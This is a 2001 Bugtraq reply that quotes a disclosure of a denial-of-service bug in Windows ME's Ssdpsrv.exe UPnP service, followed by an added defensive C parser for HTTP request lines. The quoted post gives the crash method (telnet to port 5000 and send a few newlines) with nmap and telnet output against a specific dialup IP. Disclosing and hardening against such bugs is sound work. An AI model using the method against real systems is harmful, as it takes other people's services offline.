One of my PCs runs Windows ME so I tried to replicate the crash but to no avail. I can send 3 newline commands then I get the "HTTP/1.1 400 Bad Request" but Ssdpsrv.exe does not crash. I know Microsoft aren't always that great at security but making a program that crashes after 3 new line commands seems a little silly even for them :-)

The ME install was a custom install and the service was running so I think there's a definite link there.

Rob Mears
http://www.securitywriters.org

----- Original Message -----
From: "milo omega" <mtwoar@hotmail.com>
To: <bugtraq@securityfocus.com>
Sent: Thursday, October 18, 2001 1:46 AM
Subject: Ssdpsrv.exe in WindowsME

> By connecting to a computer running Ssdpsrv you are able to crash the
> Ssdpsrv server.
>
> Ssdpsrv.exe is the file that starts the UPnP server on WindowsME boxes.
> This service comes standard with the WindowsME installation.
>
> The Ssdpsrv.exe server is started at boot.
> Here is the registry entry:
> KEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersoin\RunServices
> Here is the file that starts the server:
> c:\windows\system\ssdpsrv.exe
>
> For information about UPnP go here:
> http://support.microsoft.com/support/kb/articles/Q262/4/58.ASP
>
> Upon running a scan on a computer running the server I get the following:
> <snip>
> bash-2.05$ nmap -sT 165.121.234.217
> Starting nmap V. 2.54BETA29 ( www.insecure.org/nmap/ )
> Interesting ports on user-2injqmp.dialup.mindspring.com (165.121.234.217):
> (The 1547 ports scanned but not shown below are in state: closed)
> Port       State       Service
> 139/tcp    open        netbios-ssn
> 5000/tcp   open        fics
> Nmap run completed -- 1 IP address (1 host up) scanned in 14 seconds
> </snap>
>
> Method to crash Ssdpsrv:
> Connect to the computer on port 5000.
> Send 3 to 5 newline characters.
> You then get an error and are disconnected.
> <snip>
> bash-2.05$ telnet 165.121.234.217 5000
> Trying 165.121.234.217...
> Connected to 165.121.234.217.
> Escape character is '^]'.
>
>
>
> HTTP/1.1 400 Bad Request
>
> Connection closed by foreign host.
> bash-2.05$
> </snap>
>
> Here is the error caused by the crash:
> Ssdpsrv has caused an error in MSVCRT.DLL.
> Ssdpsrv will now close.
> If you continue to experience problems,
> try restarting your computer.
>
> This causes the server crash and closes port 5000.
> Either you must restart the server by manually running ssdpsrv.exe
> or reboot.
>
> shouts to pulltheplug #c.
> :o
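
The thread does not say why Ssdpsrv.exe faults in MSVCRT.DLL, so the following is not a reconstruction of that bug. It is an added example (not code from either poster or from Microsoft) of how an HTTP listener can handle the input described above, a connection that sends only newlines, by skipping leading empty lines as RFC 2616 section 4.1 recommends and answering 400 without touching memory outside its buffers. The function name `parse_request_line` and the `MAX_REQUEST_LINE` limit are assumptions made for the example.

```c
#include <stddef.h>
#include <string.h>

#define MAX_REQUEST_LINE 256   /* hypothetical limit chosen for this example */

/* Extract the HTTP request line from a received buffer.
 * Returns 200 and a NUL-terminated line in out, or 400 if the input holds
 * no usable request line. Never reads past len or writes past outcap. */
int parse_request_line(const char *buf, size_t len, char *out, size_t outcap)
{
    size_t start = 0, end;

    if (buf == NULL || out == NULL || outcap == 0)
        return 400;
    out[0] = '\0';

    /* Skip empty lines sent before the request line (RFC 2616, 4.1). */
    while (start < len && (buf[start] == '\r' || buf[start] == '\n'))
        start++;
    if (start == len)
        return 400;            /* nothing but newlines, as in the post */

    /* Find the end of the line; an unterminated line is rejected. */
    for (end = start; end < len && buf[end] != '\n'; end++)
        ;
    if (end == len)
        return 400;
    if (buf[end - 1] == '\r')  /* end > start here: buf[start] is not CR/LF */
        end--;

    if (end - start >= outcap || end - start > MAX_REQUEST_LINE)
        return 400;            /* too long for the caller's buffer */
    memcpy(out, buf + start, end - start);
    out[end - start] = '\0';

    /* Require "METHOD SP target SP version" with non-empty parts. */
    const char *sp1 = strchr(out, ' ');
    const char *sp2 = sp1 ? strchr(sp1 + 1, ' ') : NULL;
    if (sp1 == NULL || sp1 == out || sp2 == NULL ||
        sp2 == sp1 + 1 || sp2[1] == '\0')
        return 400;
    return 200;
}
```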